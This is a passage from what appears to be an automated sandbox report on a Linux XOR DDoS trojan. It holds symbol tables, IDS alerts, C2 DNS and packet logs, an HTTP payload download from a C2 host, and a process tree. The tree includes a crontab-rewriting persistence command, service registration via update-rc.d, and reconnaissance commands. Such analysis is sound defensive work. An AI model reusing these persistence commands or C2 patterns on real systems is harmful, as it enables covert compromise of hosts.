__libc_message			.symtab	0x8059ad0	691	FUNC	<unknown>	DEFAULT	3
__libc_multiple_libcs			.symtab	0x80cfa4c	4	OBJECT	<unknown>	DEFAULT	21
__libc_nanosleep			.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__libc_open			.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__libc_pause			.symtab	0x8053de0	64	FUNC	<unknown>	DEFAULT	3
__libc_pthread_init			.symtab	0x806b230	45	FUNC	<unknown>	DEFAULT	3
__libc_pvalloc			.symtab	0x80630c0	469	FUNC	<unknown>	DEFAULT	3
__libc_read			.symtab	0x8053a70	91	FUNC	<unknown>	DEFAULT	3
__libc_realloc			.symtab	0x80654c0	1085	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom			.symtab	0x8053c90	87	FUNC	<unknown>	DEFAULT	3
__libc_register_dl_open_hook			.symtab	0x80947f0	125	FUNC	<unknown>	DEFAULT	3
__libc_register_dlfcn_hook			.symtab	0x809e5b0	37	FUNC	<unknown>	DEFAULT	3
__libc_resp			.symtab	0x0	4	TLS	<unknown>	DEFAULT	13
__libc_select			.symtab	0x8069170	115	FUNC	<unknown>	DEFAULT	3
__libc_send			.symtab	0x806ae40	87	FUNC	<unknown>	DEFAULT	3
__libc_sendto			.symtab	0x8053cf0	87	FUNC	<unknown>	DEFAULT	3
__libc_setlocale_lock			.symtab	0x80d58a0	32	OBJECT	<unknown>	DEFAULT	22
__libc_setup_tls			.symtab	0x8054f00	505	FUNC	<unknown>	DEFAULT	3
__libc_sigaction			.symtab	0x8054730	298	FUNC	<unknown>	DEFAULT	3
__libc_siglongjmp			.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_stack_end			.symtab	0x80cf13c	4	OBJECT	<unknown>	DEFAULT	18
__libc_start_main			.symtab	0x80549b0	763	FUNC	<unknown>	DEFAULT	3
__libc_system			.symtab	0x8057a30	104	FUNC	<unknown>	DEFAULT	3
__libc_thread_freeres			.symtab	0x80b2980	33	FUNC	<unknown>	DEFAULT	5
__libc_tsd_CTYPE_B			.symtab	0x18	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOLOWER			.symtab	0x20	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOUPPER			.symtab	0x1c	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_LOCALE			.symtab	0x8	4	TLS	<unknown>	DEFAULT	13
__libc_tsd_MALLOC			.symtab	0x24	4	TLS	<unknown>	DEFAULT	14
__libc_valloc			.symtab	0x80632a0	467	FUNC	<unknown>	DEFAULT	3
__libc_waitpid			.symtab	0x8053e20	91	FUNC	<unknown>	DEFAULT	3
__libc_write			.symtab	0x8053a10	91	FUNC	<unknown>	DEFAULT	3
__libc_writev			.symtab	0x808b980	270	FUNC	<unknown>	DEFAULT	3
__libio_codecvt			.symtab	0x80c2e00	120	OBJECT	<unknown>	DEFAULT	7
__libio_translit			.symtab	0x80c2e78	20	OBJECT	<unknown>	DEFAULT	7
__lll_lock_wait			.symtab	0x8053730	48	FUNC	<unknown>	HIDDEN	3
__lll_lock_wait_private			.symtab	0x8053700	42	FUNC	<unknown>	HIDDEN	3
__lll_robust_lock_wait			.symtab	0x80538e0	81	FUNC	<unknown>	HIDDEN	3
__lll_robust_timedlock_wait			.symtab	0x8053940	201	FUNC	<unknown>	HIDDEN	3
__lll_timedlock_wait			.symtab	0x8053760	173	FUNC	<unknown>	HIDDEN	3
__lll_timedwait_tid			.symtab	0x8053870	112	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake			.symtab	0x8053840	43	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake_private			.symtab	0x8053810	37	FUNC	<unknown>	HIDDEN	3
__llseek			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__localtime_r			.symtab	0x8086e00	34	FUNC	<unknown>	DEFAULT	3
__longjmp			.symtab	0x80553b0	43	FUNC	<unknown>	DEFAULT	3
__lseek			.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__lseek64			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__make_stacks_executable			.symtab	0x8051210	257	FUNC	<unknown>	DEFAULT	3
__mallinfo			.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__malloc			.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__malloc_check_init			.symtab	0x8060000	121	FUNC	<unknown>	DEFAULT	3
__malloc_get_state			.symtab	0x8064180	428	FUNC	<unknown>	DEFAULT	3
__malloc_hook			.symtab	0x80cf9ec	4	OBJECT	<unknown>	DEFAULT	21
__malloc_initialize_hook			.symtab	0x80d4b40	4	OBJECT	<unknown>	DEFAULT	22
__malloc_set_state			.symtab	0x8060dc0	905	FUNC	<unknown>	DEFAULT	3
__malloc_stats			.symtab	0x8060840	529	FUNC	<unknown>	DEFAULT	3
__malloc_trim			.symtab	0x8060bd0	493	FUNC	<unknown>	DEFAULT	3
__malloc_usable_size			.symtab	0x805f010	52	FUNC	<unknown>	DEFAULT	3
__mallopt			.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__mbrlen			.symtab	0x8086500	55	FUNC	<unknown>	DEFAULT	3
__mbrtowc			.symtab	0x8086540	407	FUNC	<unknown>	DEFAULT	3
__mbsnrtowcs			.symtab	0x8086ae0	594	FUNC	<unknown>	DEFAULT	3
__memalign			.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__memalign_hook			.symtab	0x80cf9f4	4	OBJECT	<unknown>	DEFAULT	21
__memchr			.symtab	0x8066760	411	FUNC	<unknown>	DEFAULT	3
__mempcpy			.symtab	0x8066a20	68	FUNC	<unknown>	DEFAULT	3
__mkdir			.symtab	0x8068d60	31	FUNC	<unknown>	DEFAULT	3
__mktime_internal			.symtab	0x809f300	2437	FUNC	<unknown>	DEFAULT	3
__mmap			.symtab	0x8069da0	67	FUNC	<unknown>	DEFAULT	3
__mmap64			.symtab	0x8069df0	88	FUNC	<unknown>	DEFAULT	3
__mon_yday			.symtab	0x80c72c0	52	OBJECT	<unknown>	DEFAULT	7
__morecore			.symtab	0x80cf9e8	4	OBJECT	<unknown>	DEFAULT	21
__mpn_add_n			.symtab	0x80aa690	144	FUNC	<unknown>	DEFAULT	3
__mpn_addmul_1			.symtab	0x80aa720	60	FUNC	<unknown>	DEFAULT	3
__mpn_cmp			.symtab	0x8096b60	92	FUNC	<unknown>	DEFAULT	3
__mpn_construct_double			.symtab	0x80aa7a0	86	FUNC	<unknown>	DEFAULT	3
__mpn_construct_float			.symtab	0x80aa760	49	FUNC	<unknown>	DEFAULT	3
__mpn_construct_long_double			.symtab	0x80aa800	71	FUNC	<unknown>	DEFAULT	3
__mpn_divrem			.symtab	0x8096bc0	1112	FUNC	<unknown>	DEFAULT	3
__mpn_extract_double			.symtab	0x80988b0	244	FUNC	<unknown>	DEFAULT	3
__mpn_extract_long_double			.symtab	0x80989b0	279	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n			.symtab	0x8097670	1989	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n_basecase			.symtab	0x8097570	247	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n			.symtab	0x8097e40	1829	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n_basecase			.symtab	0x8097470	250	FUNC	<unknown>	DEFAULT	3
__mpn_lshift			.symtab	0x8097020	87	FUNC	<unknown>	DEFAULT	3
__mpn_mul			.symtab	0x80970e0	843	FUNC	<unknown>	DEFAULT	3
__mpn_mul_1			.symtab	0x8097430	57	FUNC	<unknown>	DEFAULT	3
__mpn_mul_n			.symtab	0x8098570	620	FUNC	<unknown>	DEFAULT	3
__mpn_rshift			.symtab	0x8097080	87	FUNC	<unknown>	DEFAULT	3
__mpn_sub_n			.symtab	0x80987e0	144	FUNC	<unknown>	DEFAULT	3
__mpn_submul_1			.symtab	0x8098870	60	FUNC	<unknown>	DEFAULT	3
__mprotect			.symtab	0x8069e70	33	FUNC	<unknown>	DEFAULT	3
__mremap			.symtab	0x806add0	45	FUNC	<unknown>	DEFAULT	3
__munmap			.symtab	0x8069e50	31	FUNC	<unknown>	DEFAULT	3
__nanosleep			.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__nanosleep_nocancel			.symtab	0x80677ba	31	FUNC	<unknown>	DEFAULT	3
__new_exitfn			.symtab	0x8056000	274	FUNC	<unknown>	DEFAULT	3
__new_exitfn_called			.symtab	0x80d6240	8	OBJECT	<unknown>	DEFAULT	22
__new_fclose			.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
__new_fopen			.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
__new_getrlimit			.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__new_sem_init			.symtab	0x8053320	84	FUNC	<unknown>	DEFAULT	3
__new_sem_post			.symtab	0x8053420	78	FUNC	<unknown>	DEFAULT	3
__new_sem_wait			.symtab	0x8053380	141	FUNC	<unknown>	DEFAULT	3
__nptl_create_event			.symtab	0x8054700	5	FUNC	<unknown>	DEFAULT	3
__nptl_deallocate_tsd			.symtab	0x8050980	278	FUNC	<unknown>	DEFAULT	3
__nptl_death_event			.symtab	0x8054710	5	FUNC	<unknown>	DEFAULT	3
__nptl_initial_report_events			.symtab	0x80d20cc	1	OBJECT	<unknown>	DEFAULT	22
__nptl_last_event			.symtab	0x80d20c0	4	OBJECT	<unknown>	DEFAULT	22
__nptl_nthreads			.symtab	0x80cf4f0	4	OBJECT	<unknown>	DEFAULT	21
__nptl_setxid			.symtab	0x8050e60	941	FUNC	<unknown>	DEFAULT	3
__nptl_threads_events			.symtab	0x80d20b8	8	OBJECT	<unknown>	DEFAULT	22
__offtime			.symtab	0x809f010	746	FUNC	<unknown>	DEFAULT	3
__open			.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__open_nocancel			.symtab	0x8053d8a	33	FUNC	<unknown>	DEFAULT	3
__opendir			.symtab	0x80672a0	220	FUNC	<unknown>	DEFAULT	3
__overflow			.symtab	0x805d810	41	FUNC	<unknown>	DEFAULT	3
__parse_one_specmb			.symtab	0x8083480	1320	FUNC	<unknown>	DEFAULT	3
__pause_nocancel			.symtab	0x8053dea	19	FUNC	<unknown>	DEFAULT	3
__posix_memalign			.symtab	0x80640d0	111	FUNC	<unknown>	DEFAULT	3
__preinit_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__preinit_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__printf_arginfo_table			.symtab	0x80d63e0	4	OBJECT	<unknown>	DEFAULT	23
__printf_fp			.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
__printf_fphex			.symtab	0x8081b50	6104	FUNC	<unknown>	DEFAULT	3

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.2046.105.84.19041340532020381 07/27/22-09:48:16.981971	TCP	2020381	ET TROJAN DDoS.XOR Checkin	41340	53	192.168.2.20	46.105.84.190
192.168.2.2054.36.15.9950774802021336 07/27/22-09:48:16.811975	TCP	2021336	ET TROJAN DDoS.XOR Checkin via HTTP	50774	80	192.168.2.20	54.36.15.99

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2022 09:48:16.783644915 CEST	50774	80	192.168.2.20	54.36.15.99
Jul 27, 2022 09:48:16.785492897 CEST	58332	53	192.168.2.20	51.89.52.12
Jul 27, 2022 09:48:16.804222107 CEST	53	58332	51.89.52.12	192.168.2.20
Jul 27, 2022 09:48:16.811377048 CEST	80	50774	54.36.15.99	192.168.2.20
Jul 27, 2022 09:48:16.811506987 CEST	50774	80	192.168.2.20	54.36.15.99
Jul 27, 2022 09:48:16.811975002 CEST	50774	80	192.168.2.20	54.36.15.99
Jul 27, 2022 09:48:16.841236115 CEST	80	50774	54.36.15.99	192.168.2.20
Jul 27, 2022 09:48:16.841557026 CEST	50774	80	192.168.2.20	54.36.15.99
Jul 27, 2022 09:48:16.861430883 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:16.869400978 CEST	80	50774	54.36.15.99	192.168.2.20
Jul 27, 2022 09:48:16.889141083 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:16.889360905 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:16.890917063 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:16.981792927 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:16.981971025 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:17.009732962 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:17.009866953 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:20.105091095 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:20.105371952 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:30.139403105 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:30.139549971 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:40.187340975 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:40.187572956 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:50.219664097 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:50.219796896 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:48:50.962790012 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:48:50.963001966 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:01.002229929 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:01.002315998 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:11.035569906 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:11.035737991 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:21.066747904 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:21.066915989 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:26.046308041 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:26.046515942 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:30.113114119 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:30.113437891 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:40.146789074 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:40.146972895 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:49:50.179100037 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:49:50.179317951 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:50:00.227072001 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:50:00.227237940 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:50:01.009929895 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:50:01.010052919 CEST	41340	53	192.168.2.20	46.105.84.190
Jul 27, 2022 09:50:11.056329966 CEST	53	41340	46.105.84.190	192.168.2.20
Jul 27, 2022 09:50:11.056503057 CEST	41340	53	192.168.2.20	46.105.84.190

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2022 09:48:16.764399052 CEST	39877	53	192.168.2.20	8.8.8.8
Jul 27, 2022 09:48:16.766083002 CEST	44433	53	192.168.2.20	8.8.8.8
Jul 27, 2022 09:48:16.783390045 CEST	53	39877	8.8.8.8	192.168.2.20
Jul 27, 2022 09:48:16.785253048 CEST	53	44433	8.8.8.8	192.168.2.20
Jul 27, 2022 09:48:16.804475069 CEST	43169	53	192.168.2.20	8.8.8.8
Jul 27, 2022 09:48:16.823765993 CEST	53	43169	8.8.8.8	192.168.2.20
Jul 27, 2022 09:48:16.824085951 CEST	43116	53	192.168.2.20	8.8.4.4
Jul 27, 2022 09:48:16.841267109 CEST	53	43116	8.8.4.4	192.168.2.20
Jul 27, 2022 09:48:16.841830969 CEST	60755	53	192.168.2.20	8.8.8.8
Jul 27, 2022 09:48:16.861156940 CEST	53	60755	8.8.8.8	192.168.2.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 27, 2022 09:48:16.764399052 CEST	192.168.2.20	8.8.8.8	0xad7b	Standard query (0)	www1.gggatat456.com	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.766083002 CEST	192.168.2.20	8.8.8.8	0x4e2b	Standard query (0)	p5.lpjulidny7.com	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.804475069 CEST	192.168.2.20	8.8.8.8	0x8c36	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.824085951 CEST	192.168.2.20	8.8.4.4	0x1a73	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.841830969 CEST	192.168.2.20	8.8.8.8	0xfa25	Standard query (0)	ppp.xxxatat456.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 27, 2022 09:48:16.783390045 CEST	8.8.8.8	192.168.2.20	0xad7b	No error (0)	www1.gggatat456.com		54.36.15.99	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.823765993 CEST	8.8.8.8	192.168.2.20	0x8c36	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.841267109 CEST	8.8.4.4	192.168.2.20	0x1a73	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.861156940 CEST	8.8.8.8	192.168.2.20	0xfa25	No error (0)	ppp.xxxatat456.com		46.105.84.190	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.861156940 CEST	8.8.8.8	192.168.2.20	0xfa25	No error (0)	ppp.xxxatat456.com		54.36.15.98	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.861156940 CEST	8.8.8.8	192.168.2.20	0xfa25	No error (0)	ppp.xxxatat456.com		46.105.84.188	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.861156940 CEST	8.8.8.8	192.168.2.20	0xfa25	No error (0)	ppp.xxxatat456.com		79.137.1.134	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.861156940 CEST	8.8.8.8	192.168.2.20	0xfa25	No error (0)	ppp.xxxatat456.com		79.137.1.132	A (IP address)	IN (0x0001)
Jul 27, 2022 09:48:16.861156940 CEST	8.8.8.8	192.168.2.20	0xfa25	No error (0)	ppp.xxxatat456.com		54.36.15.96	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www1.gggatat456.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	50774	54.36.15.99	80

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2022 09:48:16.811975002 CEST	1	OUT	GET /dd.rar HTTP/1.1 Accept: / Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322) Host: www1.gggatat456.com Connection: Keep-Alive

System Behavior

Analysis Process: dkuidbsedp PID: 9445, Parent PID: 9377

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	/tmp/dkuidbsedp
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9446, Parent PID: 9445

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9450, Parent PID: 9446

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9453, Parent PID: 9450

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9457, Parent PID: 9446

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9458, Parent PID: 9457

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: update-rc.d PID: 9458, Parent PID: 9457

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/usr/sbin/update-rc.d
Arguments:	/usr/bin/perl /usr/sbin/update-rc.d dkuidbsedp defaults
File size:	14437 bytes
MD5 hash:	e9e125904f9ed8ff4c8504a55a149005

Chronological Activities

Analysis Process: update-rc.d PID: 9493, Parent PID: 9458

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/usr/sbin/update-rc.d
Arguments:	n/a
File size:	14437 bytes
MD5 hash:	e9e125904f9ed8ff4c8504a55a149005

Chronological Activities

Analysis Process: insserv PID: 9493, Parent PID: 9458

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/usr/lib/insserv/insserv
Arguments:	/usr/lib/insserv/insserv dkuidbsedp
File size:	56512 bytes
MD5 hash:	34c11674a0b29347001640aeae7c94f1

Chronological Activities

Analysis Process: update-rc.d PID: 9537, Parent PID: 9458

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/usr/sbin/update-rc.d
Arguments:	n/a
File size:	14437 bytes
MD5 hash:	e9e125904f9ed8ff4c8504a55a149005

Chronological Activities

Analysis Process: systemctl PID: 9537, Parent PID: 9458

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	659848 bytes
MD5 hash:	b08096235b8c90203e17721264b5ce40

Chronological Activities

Analysis Process: dkuidbsedp PID: 9469, Parent PID: 9446

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dash PID: 9469, Parent PID: 9446

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/bin/dash
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	154072 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: dash PID: 9472, Parent PID: 9469

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/bin/dash
Arguments:	n/a
File size:	154072 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Chronological Activities

Analysis Process: sed PID: 9472, Parent PID: 9469

General

Start time:	09:48:15
Start date:	27/07/2022
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	73424 bytes
MD5 hash:	c1a00c583ba08e728b10f3f46f5776d6

Chronological Activities

Analysis Process: dkuidbsedp PID: 9546, Parent PID: 9446

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9547, Parent PID: 9546

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvilroogsz PID: 9547, Parent PID: 9546

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	/usr/bin/qvilroogsz "ls -la" 9446
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: qvilroogsz PID: 9548, Parent PID: 9547

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: dkuidbsedp PID: 9557, Parent PID: 9446

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9558, Parent PID: 9557

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvilroogsz PID: 9558, Parent PID: 9557

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	/usr/bin/qvilroogsz "cat resolv.conf" 9446
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: qvilroogsz PID: 9559, Parent PID: 9558

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: dkuidbsedp PID: 9568, Parent PID: 9446

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9569, Parent PID: 9568

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvilroogsz PID: 9569, Parent PID: 9568

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	/usr/bin/qvilroogsz "grep \"A\"" 9446
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: qvilroogsz PID: 9570, Parent PID: 9569

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: dkuidbsedp PID: 9579, Parent PID: 9446

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9580, Parent PID: 9579

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvilroogsz PID: 9580, Parent PID: 9579

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	/usr/bin/qvilroogsz "netstat -antop" 9446
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: qvilroogsz PID: 9581, Parent PID: 9580

General

Start time:	09:48:20
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: dkuidbsedp PID: 9590, Parent PID: 9446

General

Start time:	09:48:21
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9591, Parent PID: 9590

General

Start time:	09:48:21
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qvilroogsz PID: 9591, Parent PID: 9590

General

Start time:	09:48:21
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	/usr/bin/qvilroogsz "netstat -antop" 9446
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: qvilroogsz PID: 9592, Parent PID: 9591

General

Start time:	09:48:21
Start date:	27/07/2022
Path:	/usr/bin/qvilroogsz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ada71b4b71b57b78680a7d8efd5c3382

Chronological Activities

Analysis Process: dkuidbsedp PID: 9601, Parent PID: 9446

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9602, Parent PID: 9601

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
